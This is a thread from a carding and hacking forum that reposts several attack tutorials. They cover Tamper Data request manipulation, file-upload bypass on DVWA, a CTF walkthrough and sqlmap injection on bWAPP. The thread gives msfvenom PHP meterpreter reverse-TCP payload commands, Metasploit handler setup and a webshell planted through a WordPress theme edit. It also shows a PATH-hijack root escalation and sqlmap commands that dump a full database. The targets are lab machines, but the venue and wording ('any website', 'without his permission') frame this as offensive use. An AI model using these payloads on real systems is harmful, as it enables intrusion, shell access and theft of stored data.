+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Web Penetration Testing with Tamper Data (Firefox Add-on) (/Thread-Guide-How-to-Web-Penetration-Testing-with-Tamper-Data-Firefox-Add-on)
[Guide] How to Web Penetration Testing with Tamper Data (Firefox Add-on) - NINZA - 04-26-2020
Tampering is the way of modifying the request parameters before request submission. Tampering can be achieved by various methods and one of the ways is the through Tamper Data. Tamper data is one of the highly used extensions in Firefox. It allows tampering the data that is sent between the client and the server as well as easy access to GET and POSTING element’s data.
Installing Tamper Data Add-On
Select the menu bar on the right end in Firefox. Click on Add-ons.
![[Image: 1.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-Qb2n2Igx4g8/WIoVjuaJeRI/AAAAAAAAPDk/acPbDBgy6KYMf1zB8IPV41YuY-_tA33pACLcB/s1600/1.png?w=687)
In the search bar field, search for Tamper Data add-on. Click on Install after installing the add-on, restart the Firefox Browser.
![[Image: 2.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-0WAWGzTC8Ww/WIoVkfjPUII/AAAAAAAAPD4/aeVbkaL_UYUuKY4hyv4rlZRn3fMs0tbdwCLcB/s1600/2.png?w=687)
Displaying clear text password in Facebook using Tamper Data
Now I am trying to login into my Facebook account and when I typed my password I see the “password in the dotted form” so I wanted to know whether the password typed is correct or not. Click on tools option from the menu bar and select tamper data to capture the request.
![[Image: 4.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-rWKPsOO4ZuQ/WIoVnljI2_I/AAAAAAAAPE8/w55tID_6h5A-4j2-9lVL3d0IThOQwYShQCLcB/s1600/4.png?w=687)
Pop will get open for tamper data click on start tamper which starts capturing the ongoing request as we know that the username and password typed in the fields go through POST method. Now After that click on the Login button to send the data through the POST method.
![[Image: 5.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-vDZDckXUR80/WIoVnnBiSlI/AAAAAAAAPFA/aKQxcA7Q4YE_SQKXfTCVCfh7cOEhUQ5xgCLcB/s1600/5.png?w=687)
When the request will send through the browser to the web server a pop up will appear, now hit Tamper, which will start capturing the sending request.
![[Image: 6.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-2MpZKCYHeIs/WIoVn4DNLQI/AAAAAAAAPFE/rn0vOLif1Rg85xZ2GLR-NkPorkiStQ2CQCLcB/s1600/6.png?w=687)
Now you can see from the given image on the right half of Tamper Popup window it is showing the email and pass in clear text.
![[Image: 7.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-IbXzWrZW_O4/WIoVoKk3VYI/AAAAAAAAPFI/H3bloI9Itwo0e0uDXslM2VVR9ihkhuZAQCLcB/s1600/7.png?w=687)
HTML Injection – Reflection POST method with Tamper Data
I have installed bWAPP on my wamp server running on localhost. It can be accessed through the browser. Navigate to the login page using URL “localhost/bWAPP/login.php”.
Login into web application server by typing bee: bug as login credential, now choose your bug” html injection-reflected (post)” from the given list of bugs and click on the hack.
![[Image: 15.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-3oIjGDSXBkY/WIoVj-E6uUI/AAAAAAAAPDo/X2UgNJMi-yUaPfy7_LuN4P0zATpDymOCwCLcB/s1600/15.png?w=687)
In given text field enter first name: kunal and last name: bhal.
![[Image: 16.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-slEJmBKzk5g/WIoVj9m-ggI/AAAAAAAAPDs/ODzwpvI8LbgoKULEwHamowHjKo2S_ee3ACLcB/s1600/16.png?w=687)
Before clicking Go; again start tamper data to change the field values. After that, we can see the post values and now modify it to change the username of any person.
![[Image: 17.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-EGWkuk7ty4s/WIoVkAoDh2I/AAAAAAAAPDw/Mx7WHe8BQH8DVIhVoJOrdcmxHKKurp6PQCLcB/s1600/17.png?w=687)
Now click on go and a dialogue box gets opened here click on tamper to capture the request.
![[Image: 20.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-gsj9zQTN7SE/WIoVkQQQveI/AAAAAAAAPD0/7QD_S4jToWkU3VcseF3LaQ66YUCdMvuIQCLcB/s1600/20.png?w=687)
Here you can read the captured request from the given screenshot which has captured the first and last name kunal:bhal.
![[Image: 21.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-O81UGdJk4mc/WIoVkmAsFvI/AAAAAAAAPD8/yiTuLAFRgJ8BZVe_oen5qP7-fXjNOCeogCLcB/s1600/21.png?w=687)
Tamper data allow you to modify the sent request of any user without his permission, so I am going to change first and the last name given by user into first as the first name and last as the last name and then click on ok to forward the request.
![[Image: 22.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-cEASFnU7u0k/WIoVk23Tb7I/AAAAAAAAPEA/jFbcOYWlrR4FROg9Gd9fCcTvlCj2D5clgCLcB/s1600/22.png?w=687)
Now you can see the request has been forward on the web server.
![[Image: 23.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-owQKZCEILnI/WIoVk_hl3aI/AAAAAAAAPEE/7RzC2GADRRwXKy0mOw7RRwrU0SFkSS11ACLcB/s1600/23.png?w=687)
We successfully changed the username of the person; here you can see username to be “first last”. Similarly, you can use other modules with tamper data to exploit bWAPP.
![[Image: 24.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-xsIMBoW5nGQ/WIoVlWk4xwI/AAAAAAAAPEI/G2oml3vfz14iRGDxt5Ky-s93GOXmwHEhQCLcB/s1600/24.png?w=687)
File upload using tamper data
Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and log in with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level medium then select file upload vulnerability
Open the terminal in Kali Linux and create PHP backdoor through the following command
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw
Copy and paste the highlighted code in leafpad and save as with PHP extension as hacked.php.png on the desktop.
Load Metasploit framework type msfconsole and start multi handler.
![[Image: 25.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-ktMeIrkGD8s/WIoVlWrptXI/AAAAAAAAPEM/mMipfvC37WU3ktmaj376209iMrstqC-9QCLcB/s1600/25.png?w=687)
Now click to browse button to browse the hacked.php.png file to upload.
![[Image: 26.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-vMTNEFgkGo8/WIoVluXG5EI/AAAAAAAAPEQ/IBvrWrvTsQ4hGdUGlNkSop0quiWSed1QgCLcB/s1600/26.png?w=687)
Click on tools option from the menu bar and select tamper data to capture the request.
![[Image: 27.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-mrJQ_rVBRNo/WIoVl2OJdyI/AAAAAAAAPEU/5H4yuzNMMKINEBPv_ptc1Az9TMHvUKK1ACLcB/s1600/27.png?w=687)
Before clicking upload; again start tamper data and then click on upload; when the request will send through the browser to the web server a pop up will appear then, now hit Tamper, which will intercept the sending request.
![[Image: 28.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-AM_EvdD9N8c/WIoVlw-4VII/AAAAAAAAPEY/trDutxVRsOwea6jVAhMw5_fu8FLaC072ACLcB/s1600/28.png?w=687)
From the given image, you can see tamper data has captured the POST request now copy the selected data from POST DATA.
![[Image: 29.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-JELf1uvvP50/WIoVmAzenpI/AAAAAAAAPEc/RV3LEvMy9OUPP6sqSxEOnsS-7Vyqx44rACLcB/s1600/29.png?w=687)
Paste POST DATA in a text file to change the extension of our upload. As you can read the name of the file is hack.php.png but we want to upload a PHP file.
![[Image: 30.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-_DGYgglinoc/WIoVmvUi5qI/AAAAAAAAPEk/v3vdNdwr-pED99WHICs32L6l3J-3cajIACLcB/s1600/30.png?w=687)
Now modify pasted POST DATA hacked.php.png into hacked.php then select and copy the complete data.
![[Image: 31.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-bdx7wviuLTw/WIoVmpkx9eI/AAAAAAAAPEo/qYJxT4JWrfsEFJoALFtUGsX43bfKqmgCwCLcB/s1600/31.png?w=687)
Now paste the whole data of text file in the field given for POST DATA and click on ok
![[Image: 32.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-q35glimm6ww/WIoVm6VkL9I/AAAAAAAAPEs/WohQAXF1jSQLYN2yGGQfMofJlBP-Q44qwCLcB/s1600/32.png?w=687)
So here we have forward the modified request, now click on stop tamper.
![[Image: 33.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-6-1aLQ1_yAw/WIoVnHH39ZI/AAAAAAAAPEw/HlDCKQsVspYOFjF42lDS0AK7trjyY8wiQCLcB/s1600/33.png?w=687)
From the image, you can see our PHP is uploaded in the uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where the file is uploaded and run this path
//192.168.1.102:81/DVWA/hackable/uploads/hacked.php
1
//192.168.1.102:81/DVWA/hackable/uploads/hacked.php
in URL to execute it.
![[Image: 35.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-hUdyqRAXTjM/WIoVnJAVFXI/AAAAAAAAPE0/cQ9VOJXLb4U23UnNKOEi_ByYqsOYttKlgCLcB/s1600/35.png?w=687)
You will get victim reverse connection on metasploit.
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
meterpreter > sysinfo
1
2
3
4
5
6
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
meterpreter > sysinfo
I have got a meterpreter session of victim PC
![[Image: 36.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-5W6xlB_iQIw/WIoVnYjaMPI/AAAAAAAAPE4/KlDWE_z-ShIQKlfv4O-EAL8E8f_yVXJRACLcB/s1600/36.png?w=687)
A new challenge for all of you guys!
This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab. All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take it’s IP settings from DHCP.
Download lab from here:
[To see content please register here]
Let’s get started with our first step.netdiscover
1
netdiscover
From this, we get our target IP.
Target IP: 192.168.0.103
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zd9Jq0ojgHw/WImqV8OJf7I/AAAAAAAAPBg/rLiy5lxxIIEojNe_6irvP6wd03pudaQ4gCLcB/s1600/1.png?w=687&ssl=1)
Now we will scan it with nmap which will give us all the open ports in a particular lab for further penetration testing.
nmap -p- -A 192.168.0.103
1
nmap -p- -A 192.168.0.103
This result shows that the following ports are open 22, 80, 3129, 3306, 21211 and http proxy is used on port 3129.
![[Image: 2.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-diuM9B9r8Sc/WImqX3Uv3XI/AAAAAAAAPCI/FN7mpm9-pZ8kpP1_l9rTTaTgpAS_RYApwCLcB/s1600/2.1.png?w=687&ssl=1)
So now let’s proceed with further penetration testing. Firstly we’ll go with ssh on port 22.
ssh 192.168.0.103
1
ssh 192.168.0.103
Ssh revealed a ascii Dragon with some strings and a base64 code written at the bottom. Looking closer you’ll see something written on top AES-ECB.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-7w7Ui2BdSVY/WImqX-xz-vI/AAAAAAAAPCM/0NO3I9dIE0wX6_8Rr9PxYwMZjavznLB0gCLcB/s1600/2.png?w=687&ssl=1)
By Google search, we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in the image by all this process we arrived at our 1st flag i.e ITALY FLAG
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-l2_tilfqGmw/WImqaEB75DI/AAAAAAAAPC4/Xp5dm0E7cuEt0NIxO_TPh4pudnYjIMH1ACLcB/s1600/3.png?w=687&ssl=1)
Ok so now let’s head towards the second flag and for that, we are going to open target IP in the browser as port 80 is also open. Look at that. We got access forbidden. No result.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-EataWRirZG8/WImqafP-UmI/AAAAAAAAPDA/dW2L62OCZuEsUXqmc6NyKzxJflLqK2aEACLcB/s1600/4.png?w=687&ssl=1)
As we opened target IP in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in the browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to the repeater.
Look over screenshot below you will find two panels left and right for request and response respectively. In the response window, the highlighted text is our flag.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-lXBcRarurxM/WImqau59JcI/AAAAAAAAPDE/rummitNMTnMZRyE4b80cwC87kaSnrhQgwCLcB/s1600/5.png?w=687&ssl=1)
As this code is in base64 so we are going to use HackBar plugin in Mozilla Firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-RahylxGy9uE/WImqaqV1UuI/AAAAAAAAPDI/6mByxL8nMKQJoc0e7AdYBOivHlZV6Kl-gCLcB/s1600/6.png?w=687&ssl=1)
Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set the proxy setting for our target IP with port number 3129 as shown below.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-i9scZb0fg9w/WImqa_VvkbI/AAAAAAAAPDM/-_8QC9fDZbccicBnJiP1s69xtKjG0MizQCLcB/s1600/7.png?w=687&ssl=1)
Now try opening target IP in a browser and wait for a few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-RGPNHdU1RG0/WImqbBslE9I/AAAAAAAAPDQ/1N52hKTE9_cHu63j_VI6elIRzhD4Tq0RgCLcB/s640/8.png?w=687&ssl=1)
The site didn’t show much so I used Nikto scanner with a proxy to get some information about it which will be helpful in further testing.
nikto -h 192.168.0.103 –useproxy
[To see content please register here]
1
nikto -h 192.168.0.103 –useproxy
[To see content please register here]
It reveals a WordPress login at /blog.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-LjtFa_AdlHc/WImqbI5CNRI/AAAAAAAAPDU/cMGtMmLe03cBvBqKG4zv-sGRInlH5EJegCLcB/s640/9.png?w=687&ssl=1)
Ok! Now open it in the browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.
Scrolling down in this site you can see that there is an interesting second post which shows ‘I have a message for you’. There is a highlighted option so just try to open it in the browser.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-RHjmRMLjhN8/WImqWLyc3zI/AAAAAAAAPBk/JmWqb_B8QXkhliiTxwzvWchW9bkYdpMIACLcB/s1600/10.png?w=687&ssl=1)
Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-EFrm9SToeJE/WImqV34Cx1I/AAAAAAAAPBc/GR6I1t_XpVYUzoRJlBnARUet5ymazv7YACLcB/s1600/11.png?w=687&ssl=1)
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-aY3NHJQAfec/WImqWaFX4BI/AAAAAAAAPBo/JCrHFIFHnis9pX9GVge7bxgHGkyV_ApLACLcB/s1600/12.png?w=687&ssl=1)
Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at the bottom.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-8RQ7pBrrEIs/WImqWpH_uDI/AAAAAAAAPBw/9Vn2rS0fzX0UEHQeAs2HWxBqnnEMRhllQCLcB/s1600/13.png?w=687&ssl=1)
Here we decrypt the code in the hackbar plugin which results in another flag. From this step, we got our third flag i.e. PORTUGAL FLAG
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-86e_Pznjd5A/WImqWmSfUII/AAAAAAAAPBs/aML9dZWDxVURwuGRpLqhNgSWsYbLvJCPACLcB/s1600/14.png?w=687&ssl=1)
Now, returning to the previous site there are several posts which are all useless so just scroll down to see if there is something useful or not and then comes the last post which is of our interest.
‘Protected: the secret chapter ‘
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-rNbcberts8A/WImqXO0OluI/AAAAAAAAPB0/pwLPw3tCyKAaEpTW3qaRF8wZZrgB013nQCLcB/s1600/15.png?w=687&ssl=1)
Oh! We have to provide a password to get through it. This one took some time and to spare your time I won’t go through my failures,
I have created a dictionary of possible passwords which are nothing but some of the words in this whole page with the help of the following command.
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt
[To see content please register here]
1
cewl -d 2 -m 5 --proxy_host 192.168.0.103 --proxy_port 3129 -w /root/Desktop/dict.txt
[To see content please register here]
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-vNgzoflsyDo/WImqXJQiNxI/AAAAAAAAPB4/mNGJYBlRyPczPwswADzsLeVaS4DKttxBwCLcB/s1600/16.png?w=687&ssl=1)
From the list we get that password is ‘westerosi’
Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-bT0mndllrbM/WImqXSd3NUI/AAAAAAAAPB8/V5dTWQaucUgNYB-RhYtlUkPGx_ki_uj5gCLcB/s1600/17.png?w=687&ssl=1)
Now again decrypt it in and as a result, we have our fourth flag i.e. PARAGUAY FLAG
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-0sYibL9eFxE/WImqXnh20fI/AAAAAAAAPCA/eMu017LNeXE_c7yyZTaYhjImnpWfp7iggCLcB/s1600/18.png?w=687&ssl=1)
Moving to one level up, from the site we got another message that “the mother_of_dragons has a password which is in right front of your eyes”.
Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.
I looked at the message again and it states ‘password which is in front of your eyes’
That’s the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute where is this password is used.
We have an FTP service running. So let’s try and get through it
ftp 192.168.0.103 21211
ls –al
get .note.txt
exit
cat .note.txt
1
2
3
4
5
ftp 192.168.0.103 21211
ls –al
get .note.txt
exit
cat .note.txt
bingo! Here that password is used. At the bottom result shows that children’s name is used for the password. Again a password but this time it is used for WordPress login which we are going to use in coming steps.
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-vBdlr1pSQGQ/WImqXoX1R7I/AAAAAAAAPCE/KSlEn3bBbPEU8Afw4iZPLbGZ5h1DIaA3ACLcB/s1600/19.png?w=687&ssl=1)
Again I googled and found out she doesn’t have any children rather had 3 dragons named Drogon, Rhaegal, and Viserion. So I put all these names into a file along with all possible combinations.
The list is small so by entering each one the desired password could find out.
Password is RhaegalDrogonViserion
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-SVpj6b49RGY/WImqYKCh9OI/AAAAAAAAPCQ/7up4cRM5JxA0UqhtsorwWIcaH8F1D0cbQCLcB/s1600/20.png?w=687&ssl=1)
Apply the credentials for WordPress and we are in!
Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-6UVG3V0JVxY/WImqYQ_2cqI/AAAAAAAAPCU/Viq_457iFq4VMmgvKzsuJlxjdL1O__g5QCLcB/s1600/21.png?w=687&ssl=1)
Like always decode the base64 code in HackBar and here we have another flag.
This is our fifth flag i.e. THAILAND FLAG
![[Image: 22.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Eyx_WIMhGik/WImqYUiSFaI/AAAAAAAAPCY/Of_KE57O1rYG5sM1vB5zAf8h102CM2l4QCLcB/s1600/22.png?w=687&ssl=1)
Now with only 2 flags left its time for shell access as we have WordPress.
Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-ZEG3dCN1B-s/WImqYwrlpEI/AAAAAAAAPCc/w0qpJutfofgX7Al30PQoSg7-cjkL9o8BQCLcB/s1600/23.png?w=687&ssl=1)
Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above-highlighted php code.
![[Image: 24.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-y2KlZltTijc/WImqY30_57I/AAAAAAAAPCg/DmxYZdj9SAA2YsRCOeKzI_xIXRG1ITicgCLcB/s1600/24.png?w=687&ssl=1)
On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
1
2
3
4
5
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
as we have a meterpreter session, now go to shell and type following commands
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
1
2
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /srv/http
ls
1
2
cd /srv/http
ls
it shows a reward_flag.txt file so call it with the cat command
cat reward_flag.txt
As a result, we get a base64 encoded string.
![[Image: 25.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-SGgF_Ky9sOk/WImqZP6EJiI/AAAAAAAAPCk/HxE_mvCV-x0Ij1WQAoVfYg5uenjyBVOswCLcB/s1600/25.png?w=687&ssl=1)
Do not worry soon this decoding thing is going to over as we have the sixth flag with this decoding. So, as a result, our sixth flag is MONGOLIA FLAG
![[Image: 26.1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-7v_CjMqR6Fc/WImqZf5EjvI/AAAAAAAAPCo/Ig4hmvMVzEk4AxAo8T6n1Vroo3XxBT6KQCLcB/s1600/26.1.png?w=687&ssl=1)
Back to another file in the above list of files i.e. winterfell_messenger . We see its executable and owner is root. So run it with the following command
./winterfell_messenger
cat /root/message.txt
1
2
./winterfell_messenger
cat /root/message.txt
It shows that it’s using the cat command to read a file in the /root directory.
Using strings shows that cat command is being used; however, it’s not using the full path to the program. From this, we come to know that it will search for set PATH to run.
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-3QDWEPb18h4/WImqZSo5oQI/AAAAAAAAPCs/WjpElkuyBcEnxFSEsERYtDBgePK0MA1vgCLcB/s1600/26.png?w=687&ssl=1)
Now, we are able to update PATH by using export but first, we need to find out the writable directory and for that, we have used /tmp. In /tmp, we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
1
2
3
4
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
After this step, we are going to update the PATH to remove the /tmp directory we added. For this type the following commands.
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
1
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Now, we will go to the home directory of http to get the desired file. For that type
cd /srv/http
ls
1
2
cd /srv/http
ls
now call the winterfell_messenger file by using given command.
./winterfell_messenger
id
1
2
./winterfell_messenger
id
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-q7epCc1z1gU/WImqZh7rSTI/AAAAAAAAPCw/vqbSou8GgowedQAz2b_KgXSZYPwI1GreQCLcB/s1600/27.png?w=687&ssl=1)
Now go to root and there we have .flag.txt file.
Now running cat against .flag.txt we get congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.
cd /root
/usr/sbin/cat .flag.txt
1
2
cd /root
/usr/sbin/cat .flag.txt
![[Image: 28.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-8KKALrqtKFA/WImqZ5uGkdI/AAAAAAAAPC0/b4Kc8YbonR8lCVisKm9LuWuLPghW8WlTACLcB/s1600/28.png?w=687&ssl=1)
Finally decoding in hackbar reveals the seventh and last flag which is nothing but the SOMALIA FLAG
![[Image: 29.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-CTQEeo_qx6I/WImqaMHI7ZI/AAAAAAAAPC8/jYixuWp3PLQ1ApMu_p6xN-6Ssi8PaKepwCLcB/s1600/29.png?w=687&ssl=1)
Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously, penetration skills are refreshed.
In this tutorial, you will come to across how to perform a SQL injection attack on a login form of any website. There are so many examples related to login form like facebook login; Gmail login; other online accounts which may ask you to submit your information like username and password and then give permission to login your account on that web server. Here we are going to perform SQL injection login form attack on a vulnerable web server application and then fetch the information present inside their database.
Requirement:
- Xampp/Wamp Server
- bWAPP Lab
- Kali Linux: Burp suite, sqlmap tool
[To see content please register here]
now open the bWAPP in your pc and log in with following credentials:Let’s begin!!!
Start service Apache and Mysql in Xampp or Wamp server. Let’s open the localhost address in the browser as I am using 192.168.1.102:81/bWAPP/login.php. Enter user and password as bee and bug respectively.
Set security level low, from list box chooses your bug select SQL-Injection (Login form/Hero) now and click on the hack.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-AWQBNLdSSRo/WIYv0EB4DTI/AAAAAAAAPAk/axqBqssGk_4Ty8BdPUDRO3JH-wiecRGZACLcB/s640/1.png?w=687&ssl=1)
A login form gets open where it is asked to submit the credential of a superhero which we don’t know. So I am going to give any random login and password like iron: man, in order to capture the request through burp suite.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-m21f3w1H2Ks/WIYv0uEHrPI/AAAAAAAAPAw/muacJDL26Ec8RVvBZtq1hYG1sj--1QnOACLcB/s1600/2.png?w=687&ssl=1)
To capture the request of bWAPP click on the proxy tag then click to inception is on the button, come back to bWAPP and now click to login. Use intercepts highlighted data within sqlmap commands.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-PV1K95jXz4M/WIYv0R4dXtI/AAAAAAAAPAs/R-Iz8S2TO-sDvogG1S11S3aSnvDEI599gCLcB/s1600/3.png?w=687&ssl=1)
Now open the terminal of your kali Linux and type following command for the enumeration of databases name.
sqlmap -u
[To see content please register here]
--data="login=iron&password=man&form=submit" --method POST --dbs --batch1
sqlmap -u
[To see content please register here]
--data="login=iron&password=man&form=submit" --method POST --dbs --batch![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-ryW7KDOtmmg/WIYv02ZHsyI/AAAAAAAAPA0/M5nJu0CikmcYDrtU4iJQJ3SVZkGXoexzwCLcB/s1600/4.png?w=687&ssl=1)
From enumeration result, we get the information of the bend-end database management system is MYSQL 5.5 and web server operating system is windows with Apache 2.4.7 and PHP 5.5.9 and fetch all names of the database. So if you notice the image given below we have caught all name of databases. Choose any name for fetching more details.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-TgPW8ECJdGA/WIYv1HebPVI/AAAAAAAAPA4/ljuTZK67pEkC3w-n83rQWGU2tRaaDIllQCLcB/s1600/5.png?w=687&ssl=1)
Now type the below command which will try to fetch entire data from inside database of bwapp
sqlmap -u
[To see content please register here]
--data="login=iron&password=man&form=submit" --method POST -D bwapp --dump all --batch1
sqlmap -u
[To see content please register here]
--data="login=iron&password=man&form=submit" --method POST -D bwapp --dump all --batch![[Image: 6.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-HIDhprX_eW4/WIYv1D1hFCI/AAAAAAAAPA8/H1y8KV8nx981BBy5r94BV593jnQa3FFlgCLcB/s1600/6.1.png?w=687&ssl=1)
First I found a table “BLOG” which contains four columns but this table appears to be empty as all fields are left blank.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-1EDD115RRYY/WIYv1bRs7vI/AAAAAAAAPBA/yAFw1FacjeoZZ9mF-fwgWBtxwtMSxH0rwCLcB/s1600/6.png?w=687&ssl=1)
Next, I found table “MOVIES” in database bwapp and you can see from the given screenshot it contains movies detail. There are 10 entries in each of the following column.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-D2GER4z1aU8/WIYv1o-lwoI/AAAAAAAAPBE/0s3n9gAmSXUgRCx-FaOR27xbSOREjvIZQCLcB/s1600/7.png?w=687&ssl=1)
Luckily!!! I have got data which contains id, login, password and secret entries inside the “HEROES” table and maybe this dumped data can help me to bypass the login page of the above web page which we have open in the browser. I will use the login and password later to verify it.
